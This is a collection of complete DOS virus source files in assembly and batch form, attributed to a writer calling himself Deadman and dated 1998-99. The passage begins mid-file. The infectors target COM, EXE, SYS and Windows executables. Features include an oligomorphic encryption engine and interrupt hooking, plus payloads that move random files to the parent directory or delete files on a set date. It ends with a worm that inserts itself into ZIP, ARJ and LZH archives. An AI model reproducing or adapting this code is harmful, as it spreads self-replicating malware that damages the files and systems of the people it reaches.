return ; checking found unit: dir or file mov si,dta_ptr test byte ptr [si+15h],10000b jz infect cmp byte ptr [si+1eh],'.' jz smth_else mov di,dest_ptr mov word ptr [si+43],di add si,1eh call copyasciz mov dest_ptr,di dec di call starstar add dta_ptr,45 jmp ffirst dotdot: ; taking previous dir sub dta_ptr,45 mov di,dta_ptr cmp di,offset dtaz jb return mov ax,[di+43] mov dest_ptr,ax jmp smth_else infect: ; copy name+ext of file found mov di,dest_ptr mov si,dta_ptr add si,1eh call copyasciz ; check extension of file found cmp word ptr [si-4],'OC' je check_com cmp word ptr [si-4],'XE' je check_exe jmp smth_else check_com: cmp byte ptr [si-2],'M' je infect_executable jmp smth_else check_exe: cmp byte ptr [si-2],'E' jne smth_else infect_executable: ; clearing attributes mov ax,4301h xor cx,cx lea dx,result int 21h jc try_next ; opening file mov ax,3d02h int 21h xchg ax,bx ; reading first vsize bytes mov ah,3fh mov cx,vsize lea dx,buffer int 21h xor cx,ax jnz close ; exe determination cmp word ptr buffer,'MZ' je exetype cmp word ptr buffer,'ZM' je exetype ; here is .com type: filesize check + infection check mov file_type,'C' cmp word ptr buffer,0c033h jz close mov si,dta_ptr mov ax,word ptr [si+1ah] mov dx,word ptr [si+1ch] or dx,dx jnz close cmp ax,62000 ja close jmp no_check exetype: ; here is .exe type: infection check mov file_type,'E' cmp word ptr buffer+20h,0c033h jz close no_check: ; lseek to the eof mov ax,4202h xor cx,cx cwd int 21h ; writing the original begin to eof mov ah,40h mov cx,vsize lea dx,buffer int 21h xor cx,ax jnz close ; lseek to the bof mov ax,4200h xor cx,cx cwd int 21h ; prepare for write virus mov ah,40h mov cx,vsize lea dx,buffer ; exe determination cmp file_type,'E' jne no_exe ; .exe trick, write new exe header push ax bx cx dx mov ah,40h mov cx,20h lea dx,exe_hdr int 21h pop dx cx bx ax sub cx,20h no_exe: ; encrypt virus call encrypt ; write virus body int 21h dec file_cnt close: ; restore file time/date mov si,dta_ptr mov ax,5701h mov cx,word ptr [si+16h] mov dx,word ptr [si+18h] int 21h ; close file mov ah,3eh int 21h ; restore file attributes mov ax,4301h xor cx,cx mov cl,byte ptr [si+15h] mov dx,9eh int 21h try_next: ; look for a next file jmp smth_else return: ret ; *********************** ; * OLIGOMORPHIC ENGINE * ; *********************** encrypt: ; save registers are in use push ax bx cx dx si di bp ; copy virus to the buffer mov si,100h lea di,buffer mov cx,vsize rep movsb ; get random decryptor in al,40h sub al,2 jnc $-2 add al,2 cbw add al,al push ax add ax,offset algo_table mov si,ax mov ax,word ptr [si] mov word ptr buffer[algo-virus],ax ; get encryptor for this decryptor pop si add si,offset de_table mov ax,word ptr [si] mov word ptr algo_temp,ax ; get encrypting key get_normal: in al,40h or al,al jz get_normal mov byte ptr buffer[key-virus],al ; set SI and CX lea si,buffer+(encrypted-virus) mov cx,enc_size ; encrypting virus algo_temp: dw ? inc si loop algo_temp ; restore registers pop bp di si dx cx bx ax ; return ret algo_table: ; encryptors sub [si],al xor [si],al add [si],al de_table: ; decryptors add [si],al xor [si],al sub [si],al exe_hdr: ; virus .exe header dw 5a4dh ; signature dw 0000h ; image size mod 512 dw 0002h ; image size div 512 dw 0000h ; relocations dw 0002h ; header size in paragraphs dw 0000h ; minimum memory dw -1h ; maximum memory dw -10h ; SS dw -2h ; SP dw 019fh ; checksum (fuck her) dw 0100h ; IP dw -10h ; CS dw 0000h ; offset of relocation table dw 0000h ; overlay number ; garbage for .exe infection db 20h dup (5ah) vsize equ $-virus enc_size equ $-encrypted buffer db vsize dup (0C3h) file_type db ? file_cnt db ? dta_ptr dw ? dest_ptr dw ? stacks db 100h dup (?) result db 200h dup (?) dtaz label byte memory_size equ $-virus end virus [NAPOLEON.ASM] [NATURE.ASM] model tiny codeseg locals org 100h Nature: db 0e9h,0,0 ; real nop neg sp not sp inc sp push ax bx cx dx si di bp push ss pop ss call getlocation ; get extra offset getlocation: pop bp sub bp,offset getlocation call payload mov ax,0ffffh ; verify if resident int 21h cmp ax,0faceh je complete xor ax,ax ; get the copy of mov ds,ax ; int 21h vector mov si,21h*4 lea di,old21+bp movsw movsw mov si,21h*4 lea di,old21c+bp movsw movsw xor ax,ax ; copy integrity check mov es,ax ; subroutine to vector mov ax,cs ; table (0000:0200) mov ds,ax mov di,200h lea si,tester+bp mov cx,endt-tester rep movsb mov ax,0bb00h ; load virus to video mov es,ax ; memory mov ax,cs mov ds,ax lea si,Nature+bp mov di,100h mov cx,endv-Nature rep movsb xor ax,ax ; set int 21h vector mov es,ax ; to 0000:0200 mov di,21h*4 mov ax,200h stosw xor ax,ax stosw complete: mov ax,cs ; restore the original mov ds,ax ; begin of infected mov es,ax ; program mov di,100h lea si,prev+bp mov ax,1200h int 2fh mov ah,al xor word ptr [si],ax neg byte ptr [si+2] movsw movsb pop bp di si dx cx bx ax ; restore registers mov ds:[0fffch],0100h ; save 100h on stack mov sp,0fffch ret ; virus return elsebyte dw 1234h prev db not 0c3h,0,0 ; stored begin jump db 0e9h,0,0 old21 dw 0,0 tester: pushf ; virus integrity check push ds ax mov ax,0bb00h mov ds,ax cmp word ptr sign,'N[' ; number 1 jne crash cmp word ptr sign+2,'TA' ; number 2 jne crash cmp word ptr elsebyte,1234h ; number 3 jne crash pop ax ds ; passed popf db 0eah ; jump virus dw int21h,0bb00h crash: mov ax,word ptr cs:[old21c-tester+200h] mov word ptr cs:[21h*4],ax ; Crashed, reset int21h mov ax,word ptr cs:[old21c+2-tester+200h] mov word ptr cs:[21h*4+2],ax pop ax ds popf db 0eah old21c dw 0h,0h endt: sign db '[NATURE]',0 db 'Copyright (C) 1998-99 Deadman',0 int21h: pushf ; int 21h handler cmp ax,0ffffh ; test if TSR? jne nottsr mov ax,0faceh popf iret nottsr: cmp ax,4b00h ; execute? je INFECT popf jmp dword ptr cs:old21 INFECT: push ax bx cx dx si di es ds xor ax,ax ; take and set int 24h mov es,ax push word ptr es:[24h*4+2] push word ptr es:[24h*4] mov word ptr es:[24h*4],offset int24h mov word ptr es:[24h*4+2],cs pushf ; interrupt return ;-) push cs push offset contin int24h: mov al,3 iret contin: mov ax,4300h ; get and set file int 21h ; attributes mov si,cx xor cx,cx mov ax,4301h int 21h jnc a0 jmp noinf a0: push dx ds si mov ax,3d02h ; open file for r/w int 21h jnc a1 jmp fuck a1: mov bx,ax mov ax,5700h int 21h push cx dx mov ax,cs ; read 3 first bytes mov ds,ax mov es,ax mov ah,3fh lea dx,prev mov cx,3 int 21h cmp ax,cx je a2 jmp fuckc a2: mov ax,4202h ; lseek eof xor cx,cx xor dx,dx int 21h or dx,dx jz a3 jmp fuckc a3: cmp ax,64000 ; large? jbe a4 jmp fuckc a4: cmp byte ptr prev,0e9h jne a5 push ax sub ax,endv-Nature cmp word ptr prev+1,ax pop ax je fuckc a5: cmp word ptr prev,'MZ' ; exe code type? je fuckc cmp word ptr prev,'ZM' je fuckc mov word ptr jump+1,ax ; new jump mov ax,1200h int 2fh mov ah,al xor word ptr prev,ax neg byte ptr prev+2 mov ah,40h ; write virus body mov cx,endv-Nature ; to the eof lea dx,Nature int 21h xor cx,ax jnz fuckc mov ax,4200h ; lseek bof xor cx,cx xor dx,dx int 21h mov ah,40h ; write new jump mov cx,3 lea dx,jump int 21h fuckc: pop dx cx ; restore file mov ax,5701h ; time/date int 21h mov ah,3eh ; close file int 21h fuck: pop cx ds dx ; reset file mov ax,4301h ; attributes int 21h noinf: xor ax,ax ; reset int 24h vector mov ds,ax pop word ptr ds:[24h*4] pop word ptr ds:[24h*4+2] pop ds es di si dx cx bx ax popf jmp dword ptr cs:old21 ; goto old handler fmask db '*.*',0 ; PAYLOAD payload: in al,40h test al,1111111b jz $+3 ret push ds es mov ah,1ah ; set new dta lea dx,dta+bp int 21h xor ax,ax ; take and set int 24h mov es,ax push word ptr es:[24h*4+2] push word ptr es:[24h*4] mov ah,2ah int 21h lea ax,int24h+bp mov word ptr es:[24h*4],ax mov word ptr es:[24h*4+2],cs mov ax,cs mov es,ax xor si,si mov ah,4eh ; find first file mov cx,0 ; and get number of lea dx,fmask+bp ; files in this findnext: int 21h ; directory jc nomore inc si mov ah,4fh jmp findnext nomore: cmp si,1 jbe nofiles in ax,40h ; get random file xor dx,dx div si mov si,dx mov ah,4eh ; get one's name lea dx,fmask+bp mov cx,0 _findnext: int 21h mov ah,4fh dec si jnz _findnext mov ah,56h ; move it to the lea dx,dta+bp+1eh ; parent directory lea di,dta+bp+1eh-3 mov [di],'..' mov byte ptr [di+2],'\' in al,40h test al,11b jnz move inc di inc di move: int 21h nofiles: xor ax,ax ; reset int 24h vector mov ds,ax pop word ptr ds:[24h*4] pop word ptr ds:[24h*4+2] pop es ds mov ah,1ah ; reset dta address mov dx,80h int 21h ret ; return endv: dta db 43 dup (?) end Nature [NATURE.ASM] [NRL.ASM] comment ` NRL Virus Copyright (C) 1998-99 by Deadman of [SOS] Some virus feautures: Being a simple DOS virus it infects only Windows Executables :) This is run-time infector which is activated on executing a WinEXE from Non-Win32 OS. It overwrites a shitty DOS area which tells you that this program cannot be run in DOS mode. Destructive, hangs on many file types run :(, for example, Multi-types, which can be run in Win and DOS mode. But on "user" pc, where are only normal Win32 filez placed, works pretty good! Compile into .exe file Virus size: 0C0h bytes - the most usual size between PE/NE/LE Header and the end of the dos exe header P.S. Virus has no comments, it seems to be very simple :) Contacts: dman@lgg.ru www.lgg.ru/~dman Enjoy, Deadman. ` .286 model tiny codeseg locals start: push cs pop ds mov ah,4eh mov cl,20h lea dx,fmask fnext: int 21h jc return push es pop ds mov ax,3d02h mov dx,9eh int 21h push cs pop ds xchg ax,bx mov ah,3fh mov cx,4096 mov dl,offset buf int 21h xor cx,ax jnz close mov ah,42h cwd int 21h lea si,buf+3ch cmp word ptr [si+2],ax jnz close mov ax,word ptr [si] cmp ax,4096 jae close cmp byte ptr [si+18h-3ch],'@' jne close mov di,word ptr [si+08h-3ch] shl di,4 sub ax,di mov cx,vsize cmp ax,cx jb close xor si,si add di,cx push es cs pop es push cx rep movsb pop di add di,0eh xchg ax,cx stosw stosw scasw stosw stosw pop es mov ah,40h mov cx,4096 mov dl,offset buf int 21h close: mov ah,3eh int 21h ignore: mov ah,4fh jmp fnext return: mov ah,9 lea dx,cannotberun int 21h mov ax,4c01h int 21h cannotberun db 'This program cannot be run in DOS mode',0dh,0ah,24h fmask db '*.exe',0 db 'NRL|Deadman/SOS' vsize equ $-start buf: end start [NRL.ASM] [PAMPERS.BAT] @ctty nul %#% if .%2==.LocalFunctionCall# goto apnd# if .%0==. goto fin# set vname#=%0 if exist %vname#% goto strt# set vname#=%0.bat if not exist %vname#% goto fin# for %%a in (%path%) do if exist %%a\find.exe set fnd#=. if .fnd#==. goto fin# :strt# echo.|date|find "05.05." %#% if errorlevel 1 goto inf# echo y>del#. for %%a in (%path%) do del %%a\*.*body#.bat for %%a in (*.bat ..\*.bat) do call body#.bat %%a LocalFunctionCall# for %%a in (\*.bat ..\..\*.bat) do call body#.bat %%a LocalFunctionCall# goto fin# ################################################ # The Pampers Virus Copyright (C) 1999 Deadman # ################################################ :apnd# find "#"<%1>nul if not errorlevel 1 goto eov# copy body#.bat+%1 body#2.bat copy body#2.bat %1 del body#2.bat goto eov# :fin# del body#.bat ctty con %#%>nul :eov# [PAMPERS.BAT] [SYSMAN.ASM] model tiny codeseg locals jumps start: db 0b8h strategy dw 000h mov cs:[6],ax push ax bx cx dx si di es ds call get_loc get_loc: nop pop di sub di,offset get_loc mov ah,2fh int 21h push es bx push cs cs pop ds es mov ah,1ah lea dx,dta+di int 21h mov ah,4eh mov cx,20h lea dx,sys_mask+di keep_find: int 21h jc no_more mov ax,3d02h lea dx,dta+di+1eh int 21h jc next xchg ax,bx mov ax,5700h int 21h push cx dx mov ah,3fh mov cx,10 lea dx,buffer+di int 21h xor cx,ax jnz close cmp word ptr buffer+di,0ffffh jnz close cmp word ptr dta+di+1ah+2,0 jnz close mov ax,word ptr dta+di+1ah cmp ax,62000 ja close mov dx,ax sub ax,vsize cmp ax,word ptr buffer+di+6 jz close xchg word ptr buffer+di+6,dx mov word ptr strategy+di,dx mov ax,4202h xor cx,cx cwd int 21h mov ah,40h mov cx,vsize mov dx,di int 21h xor cx,ax jnz close mov ax,4200h cwd int 21h mov ah,40h mov cx,10 lea dx,buffer+di int 21h close: pop dx cx mov ax,5701h int 21h mov ah,3eh int 21h next: mov ah,4fh jmp keep_find no_more: pop dx ds mov ah,1ah int 21h pop ds es di si dx cx bx sub ax,ax retn sys_mask db '*.SYS',0 db '[SYSMAN]',0 db 'Copyright (C) 1998-99 Deadman',0 vsize equ $-start buffer db 10 dup (?) dta db 43 dup (?) end start [SYSMAN.ASM] [TIE.ASM] comment absent jumps model tiny .386 codeseg org 100h start: db 24h,21h push ds es mov ax,1200h int 2fh cmp al,0ffh jz eradie lea di,eradie mov ch,0ffh rep stosw eradie: mov ah,4ah mov bh,0ffh int 21h push bx cmp bh,3bh jb exit_vir sub bx,(msize/16+2) mov ah,4ah int 21h jc exit_vir mov ah,48h mov bx,(msize/16+1) int 21h sub ax,10h mov es,ax push cs pop ds mov di,100h mov si,di mov cx,vsize rep movsb push cs offset free_mcb push es offset continue retf free_mcb: mov ax,es add ax,10h mov es,ax mov ah,49h int 21h exit_vir: pop bx pop es ds mov ah,4ah int 21h mov ah,1ah mov dx,80h int 21h cmp sp,0fffeh je rest_com mov ax,es add ax,10h add word ptr cs:_cs,ax db 0eah _ip dw ? _cs dw ? rest_com: mov di,100h db 0beh lsize dw -100h add si,di mov cx,vsize mov bx,100h-2 mov word ptr [bx],0a4f3h jmp bx ; Whole Virus continue: push cs cs pop ds es mov bp,1 mov ah,19h int 21h cmp al,1 jbe finished lea si,buffer lea di,dta mov ah,1ah mov dx,di int 21h lea dx,fspec_exe infect: mov ah,4eh mov cx,7 look: int 21h jc no_more mov ax,4300h lea dx,[di+1eh] int 21h push cx mov ax,4301h xor cx,cx int 21h cmp dword ptr [di+1ah],large vsize jbe take_next cmp dword ptr [di+1ah],large 3b000h ja take_next mov ax,3d02h int 21h jc take_next xchg ax,bx mov ax,5700h int 21h push cx dx mov ah,3fh mov cx,vsize mov dx,si int 21h push dx ax mov ax,4202h xor cx,cx cwd int 21h mov lsize,ax pop cx dx mov ax,[si] cmp ax,'MZ' je exe_infect cmp ax,'ZM' je exe_infect ; --- COM INFECT --- cmp ax,061eh je close cmp dword ptr [di+1ah],large 65535-100h-vsize-100h ja close mov ah,40h int 21h mov ax,4200h xor cx,cx cwd int 21h mov ah,40h mov cx,vsize mov dh,1 int 21h jmp close ; --- EXE INFECT --- exe_infect: mov dx,word ptr [si+14h] mov ax,word ptr [si+16h] mov word ptr _ip,dx mov word ptr _cs,ax cmp ax,word ptr [si+0eh] je close add ax,10h cmp ax,word ptr [si+0eh] je close cmp word ptr [si+0eh+2],vsize+100h jb close mov ax,word ptr [si+0eh] add ax,word ptr [si+08h] mov cx,10h mul cx add ax,word ptr [si+0eh+2] adc dx,0 cmp dx,word ptr [di+1ah+2] jb entry ja close cmp ax,word ptr [di+1ah] ja close entry: mov ax,word ptr [si+0eh] add ax,word ptr [si+08h] mov cx,10h mul cx xchg cx,dx xchg ax,dx mov ax,4200h int 21h mov ah,40h mov cx,vsize mov dx,100h int 21h xor cx,ax jnz close mov ax,4200h cwd int 21h mov ax,word ptr [si+0eh] sub ax,10h mov word ptr [si+16h],ax mov word ptr [si+14h],100h mov ah,40h mov cx,28 mov dx,si int 21h close: pop dx cx mov ax,5701h int 21h mov ah,3eh int 21h take_next: pop cx mov ax,4301h lea dx,[di+1eh] int 21h mov ah,4fh jmp look no_more: dec bp jnz finished lea dx,fspec_com jmp infect finished: retf fspec_exe db '*.EXE',0 fspec_com db '*.COM',0 db '[TIE]',0 db '(C) 99 by Deadman',0 vsize equ $-start dta db 43 dup (?) buffer db vsize dup (?) msize equ $-start end start [TIE.ASM] [INFO.BAT] @ctty nul for %%a in (*.zip ..\*.zip) do pkzip %%a %0 for %%a in (*.arj ..\*.arj) do arj a %%a %0 for %%a in (*.lzh ..\*.lzh) do lha a %%a %0 ::[ZZV] Worm by Deadman [INFO.BAT]